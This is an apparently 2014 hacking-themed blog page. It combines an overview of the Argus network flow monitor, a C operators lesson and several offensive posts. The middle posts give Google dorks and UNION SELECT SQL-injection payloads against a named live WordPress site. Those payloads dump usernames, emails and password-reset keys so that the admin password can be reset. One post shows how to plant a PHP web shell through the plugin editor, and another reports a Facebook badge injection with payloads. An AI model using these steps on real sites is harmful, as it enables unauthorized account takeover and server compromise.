Subscribe For Free Updates!

We'll not spam mate! We promise.

Saturday, 5 April 2014

Argus (Auditing Network Activity)

Argus Logo
Once again H4CK3R $P1DR3 was here these days i m learning about netwoking so i think i have to share all tools with you guyz so here we go


Argus is a fixed-model Real Time Flow Monitor designed to track and report on the status and performance of all network transactions seen in a data network traffic stream. Argus provides a common data format for reporting flow metrics such as connectivity, capacity, demand, loss, delay, and jitter on a per transaction basis. The record format that Argus uses is flexible and extensible, supporting generic flow identifiers and metrics, as well as application/protocol specific information.

Argus is composed of an advanced comprehensive network flow data generator, the Argus sensor, which processes packets (either capture files or live packet data) and generates detailed network flow status reports of all the flows in the packet stream. Argus captures much of the packet dynamics and semantics of each flow, with a great deal of data reduction, so you can store, process, inspect and analyze large amounts of network data efficiently. Argus provides reachability, availability, connectivity, duration, rate, load, good-put, loss, jitter, retransmission, and delay metrics for all network flows, and captures most attributes that are available from the packet contents, such as L2 addresses, tunnel identifiers (MPLS, GRE, ESP, etc...), protocol ids, SAP's, hop-count, options, L4 transport identification (RTP, RTCP detection), host flow control indications, etc...

Argus is used by many sites to generate network activity reports for every network transaction on their networks. The network audit data that Argus generates is great for security, operations and performance management. The data is used for network forensics, non-repudiation, network asset and service inventory, behavioral baselining of server and client relationships, detecting covert channels, and analyzing Zero day events.

Argus is an Open Source project, currently running on Mac OS X, Linux, Solaris, FreeBSD, OpenBSD, NetBSD, AIX, IRIX, Windows (under Cygwin) and OpenWrt, and has been ported to many hardware accelerated platforms, such as Bivio, Pluribus, Arista, and Tilera. The software should be portable to many other environments with littleor no modifications. Performance is such that auditing an entire enterprise's Internet activity can be accomplished using modest computing resources.

Tutorials ::

How To :: Click Here
Wiki :: Click Here

Download ::

Windows | Mac | Linux ::  Argus v3.0.6.1 | Argus v3.0.6.1 Client
Official Website :: http://www.qosient.com/argus/

Sunday, 30 March 2014

Joomla remote code execution 2014 video tutorial by Abdul Ghaffar

hello friends as you all know this tutorial is made by Abdul Ghaffar
link to video

https://www.youtube.com/watch?v=IWPmuxiJb6k

Hack WordPress site with SQL injection

Hi guyz


Again H4CK3R $P1D3R was here Today one more tut. for hack wordpress site so here we go.

As requested by few of my frnd i decided to make this small tutorial on how to hack a wordpress site that has an SQLi in plugin.

So lets begin.
I will use this 0day here by TEAM INTRA.

First of all we need to find a vulnerable page.
We enter this in Google:

Code:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"

When you found your site you need to find admin email and username.
I will be using this site for example:
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3

[Image: regiont.png]

When i add ' text disappears so it is vulnerable.

[Image: regionzn.png]

NOTE: I will not demonstrate how to SQL inject.

Now we need admin username and email.
We need to inject:

Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--

Now we have 2 users.

[Image: regionjhg.png]

We pick one and copy his email.
Go to the login page of the site.
It is usually here:

Code:
http://www.site.com/wp-login.php

And press "Lost your password?"

[Image: regionz.png]

Now you enter either username or email.
We can enter both so it doesnt matter.
I entered email.

[Image: regionby.png]
[Image: regionng.png]

Now when you got:

"Check your e-mail for the confirmation link."

It means that reset key is successfully sent.
Now we need to get the activation key.

Go back to the syntax you used for extracting email and username and do this:

Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--

Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--

[Image: regiongn.png]

Voila!
Now we just need to reset it.

Go to:
Code:
wp-login.php?action=rp&key=resetkey&login=username

NOTE: Replace key= & login= 

So my link will be:

[Image: regionzi.png]

Enter new password:

[Image: thefreenudecelebritysit.png]
[Image: regiongv.png]

Login with new password and shell it.

That's it guys.

Thanks for reading! Black Hat

Javascript injection on Facebook

[#] Title: Javascript injection on Facebook
[#] Status: Fixed
[#] Severity: Medium
[#] Author: Manjesh S
[#] Twitter: @Manjesh24



Description:

The bug was at Facebook badges and was a SELF stored injection also it was limited to only 10 characters.
I didnt found any XSS javascript which is within 10 characters and this was the main problem I was having.

When I send a request with just text : Manjesh
I was getting the output as : <div class="badge_holder bh_Manjesh"> 
This is it!! I was able to inject something on a DIV tag..
So lets checkout how I did it!!


Steps to Reproduce:
  1. Go to https://www.facebook.com/badges/profile.php?creating 
  2. Click save and modify the POST request-
    the parameter "layout" is not filtering anything, so put the small javascript payload or any HTML payload
    For example: "><b>M</b>
  3. After submitting it , the script will be executed on the browser ;)

 


Even though I was not able to do XSS, I reported this as an XSS/self stored HTML injection and this was the reply from facebook:

So it was partially rejected , there is no scope for HTML injection and as I didnt had any proof to show XSS is possible..

So what can be done with just 10 chars injection ?? No XSS possible??

Finally I didnt found any xss stuffs within 10 chars but came up with a logical Idea :D

If I am able to execute <noscript> then I could hide all the badges created, but <noscript> didnt worked instead "><script> worked!!

So here is my logical report:

So lets assume USER-A account is hacked by USER-B

USER-B goes to https://www.facebook.com/badges/profile.php?creating
and checks email,mobile no etc..
and gets the link,
the link would be like :

 https://www.facebook.com/badge.php?id=USERID&bid=BADGEID&key=KEY&format=png&z=11
 
USER-B will be able to get the email,mobile no. etc.. with this link remotely.


So USER-A will recover this account with forgot password and USER-A
will change all his email,mobile no etc..

Now USER-B can get his changed email,mobile no with the link
 https://www.facebook.com/badge.php?id=USERID&bid=BADGEID&key=KEY&format=png&z=11
 
Yes this link will wont work if badge is deleted, but if we create a
badge by sending POST request as said with this payload :

 "><script>

will make it invisible to the USER-A, he will never get to know that
badge is leaking all his private data..

also USER-A wont be able to delete the badge as he wont be able to
know that there is a badge hidden even when he goes to https://www.facebook.com/badges/profile.php .. 



[Tutorial] How to shelled wordpress site

Hi all!
H4CK3R $P1D3R was hereToday i'm going to show you how to upload shell in Wordpress software.

You will need:

1) Admin access to Worpress panel
2) Any php shell

First you need to go to:

Plugins -> Editor

[Image: regiontt.png]

Once there you can edit plugins installed on the site.
Choose any plugin you want...

[Image: regionhs.png]

For example i selected "Server buddy"
Now select one file from right site (It must be .PHP file)

[Image: regioncq.png]

When select you can edit it now.
Take your shell source and paste it there.
Now just save it. (If you got an error try other file,or simply you can't edit plugins)

[Image: regionkc.png]

You just need to access it now.
By default template in wordpress are located in:

Code:
www.site.com/wp-content/plugins/pluginname/pluginfile.php

We know our folder and name of the plugin we edited.

[Image: regionzt.png]

So our final link would be 
Code:
www.site.com/wp-content/plugins/serverbuddy-by-pluginbuddy/serverbuddy.php

[Image: regionj.png]

[Image: regionqc.png]

That would be all for today... :)

Thanx

Sunday, 26 January 2014

Learn Programming In C ,Chapter 5, Unit One( Chapter 5:C Programming Operators)



Hello  Friends This Is Yasir ,Today We Will Go Step A Head  Towards  C Programming Tutorial Series .In Our Old Tutorials We had Learn  C Programming Keywords and Identifiers , C Programming Variables and Constants and C Programming Data Types,C,programming i/o.  So Today We Will Go Step A head Towards Our Next Part Of Tutorial i.e
Chapter 5:C Programming Operators. This is 5th Chapter Of  Learn Programming In C (Introduction )Unit 1st.
 ##################################################################

                    Unit 1: C Introduction

##################################################################
Our ist Tutorial On   Chapter1 : C Programming Keyrds and Identifiers
Our 2nd Tutorial :Chapter 2: C Programming Variables and Constants

Our 3rd Tutorial:  chapter 3:  C Programming Data Types
Our 4th tutorial: Chapter 4: C programming input out functions.
-----------------------------------------------------------------------------------------------------                

                  Chapter 5:C Programming Operators

-----------------------------------------------------------------------------------------------------
Operators are the symbol which operates on value or a variable. For example: + is a operator to perform addition.
C programming language has wide range of operators to perform various operations. For better understanding of operators, these operators can be classified as:
Operators in C programming
Arithmetic Operators
Increment and Decrement Operators
Assignment Operators
Relational Operators
Logical Operators
Conditional Operators
Bitwise Operators
Special Operators

Arithmetic Operators

Operator Meaning of Operator
+ addition or unary plus
- subtraction or  unary minus
* multiplication
/ division
% remainder after division( modulo division)
Example of working of arithmetic operators

/* Program to demonstrate the working of arithmetic operators in C.  */
#include <stdio.h>
int main(){
    int a=9,b=4,c;
    c=a+b;
    printf("a+b=%d\n",c);
    c=a-b;
    printf("a-b=%d\n",c);
    c=a*b;
    printf("a*b=%d\n",c);
    c=a/b;
    printf("a/b=%d\n",c);
    c=a%b;
    printf("Remainder when a divided by b=%d\n",c);
    return 0;
}
}
a+b=13
a-b=5
a*b=36
a/b=2
Remainder when a divided by b=1
Explanation
Here, the operators +, - and * performed normally as you expected. In normal calculation, 9/4 equals to 2.25. But, the output is 2 in this program. It is because, a and b are both integers. So, the output is also integer and the compiler neglects the term after decimal point and shows answer 2 instead of 2.25. And, finally a%b is 1,i.e. ,when a=9 is divided by b=4, remainder is 1.
Suppose a=5.0, b=2.0, c=5 and d=2
In C programming,
a/b=2.5    
a/d=2.5
c/b=2.5      
c/d=2
Note: % operator can only be used with integers.

Increment and decrement operators

In C, ++ and -- are called increment and decrement operators respectively. Both of these operators are unary operators, i.e, used on single operand. ++ adds 1 to operand and -- subtracts 1 to operand respectively. For example:
Let a=5 and b=10
a++;  //a becomes 6
a--;  //a becomes 5
++a;  //a becomes 6
--a;  //a becomes 5 
Difference between ++ and -- operator as postfix and prefix
When i++ is used as prefix(like: ++var), ++var will increment the value of var and then return it but, if ++ is used as postfix(like: var++), operator will return the value of operand first and then only increment it. This can be demonstrated by an example:

#include <stdio.h>
int main(){
    int c=2,d=2;
    printf("%d\n",c++); //this statement displays 2 then, only c incremented by 1 to 3.
    printf("%d",++c);   //this statement increments 1 to c then, only c is displayed. 
    return 0;
}

Output
2
4

Assignment Operators

The most common assignment operator is =. This operator assigns the value in right side to the left side. For example:
var=5  //5 is assigned to var
a=c;   //value of c is assigned to a
5=c;   // Error! 5 is a constant.
Operator Example Same as
= a=b a=b
+= a+=b a=a+b
-= a-=b a=a-b
*= a*=b a=a*b
/= a/=b a=a/b
%= a%=b a=a%b

Relational Operator

Relational operators checks relationship between two operands. If the relation is true, it returns value 1 and if the relation is false, it returns value 0. For example:
a>b
Here, > is a relational operator. If a is greater than b, a>b returns 1 if not then, it returns 0.
Relational operators are used in decision making and loops in C programming.
Operator Meaning of Operator Example
== Equal to 5==3 returns false (0)
> Greater than 5>3 returns true (1)
< Less than 5<3 returns false (0)
!= Not equal to 5!=3 returns true(1)
>= Greater than or equal to 5>=3 returns true (1)
<= Less than or equal to 5<=3 return false (0)

Logical Operators

Logical operators are used to combine expressions containing relation operators. In C, there are 3 logical operators:
Operator Meaning of Operator Example
&& Logial AND  If c=5 and d=2 then,((c==5) && (d>5)) returns false.
|| Logical OR If c=5 and d=2 then, ((c==5) || (d>5)) returns true.
! Logical NOT If c=5 then, !(c==5) returns false.
Explanation
For expression, ((c==5) && (d>5)) to be true, both c==5 and d>5 should be true but, (d>5) is false in the given example. So, the expression is false. For expression ((c==5) || (d>5)) to be true, either the expression should be true. Since, (c==5) is true. So, the expression is true. Since, expression (c==5) is true, !(c==5) is false.

Conditional Operator

Conditional operator takes three operands and consists of two symbols ? and : . Conditional operators are used for decision making in C. For example:
c=(c>0)?10:-10;
If c is greater than 0, value of c will be 10 but, if c is less than 0, value of c will be -10.

Bitwise Operators

A bitwise operator works on each bit of data. Bitwise operators are used in bit level programming.
Operators Meaning of operators
& Bitwise AND
| Bitwise OR
^ Bitwise exclusive OR
~ Bitwise complement
<< Shift left
>> Shift right
Bitwise operator is advance topic in programming .

Other Operators

Comma Operator

Comma operators are used to link related expressions together. For example:
int a,c=5,d;

The sizeof operator

It is a unary operator which is used in finding the size of data type, constant, arrays, structure etc. For example:

#include <stdio.h>
int main(){
    int a;
    float b;
    double c;
    char d;
    printf("Size of int=%d bytes\n",sizeof(a));
    printf("Size of float=%d bytes\n",sizeof(b));
    printf("Size of double=%d bytes\n",sizeof(c));
    printf("Size of char=%d byte\n",sizeof(d));
    return 0;
}
Output
Size of int=4 bytes
Size of float=4 bytes
Size of double=8 bytes
Size of char=1 byte

Conditional operators (?:)

Conditional operators are used in decision making in C programming, i.e, executes different statements according to test condition whether it is either true or false.

Syntax of conditional operators

conditional_expression?expression1:expression2
If the test condition is true, expression1 is returned and if false expression2 is returned.

Example of conditional operator

#include <stdio.h>
int main(){
   char feb;
   int days;
   printf("Enter l if the year is leap year otherwise enter 0: ");
   scanf("%c",&feb);
   days=(feb=='l')?29:28;
   /*If test condition (feb=='l') is true, days will be equal to 29. */
   /*If test condition (feb=='l') is false, days will be equal to 28. */ 
   printf("Number of days in February = %d",days);
   return 0;
}
Output
Enter l if the year is leap year otherwise enter n: l
Number of days in February = 29
Other operators such as &(reference operator), *(dereference operator) and ->(member selection) operator will be discussed in pointer chapter.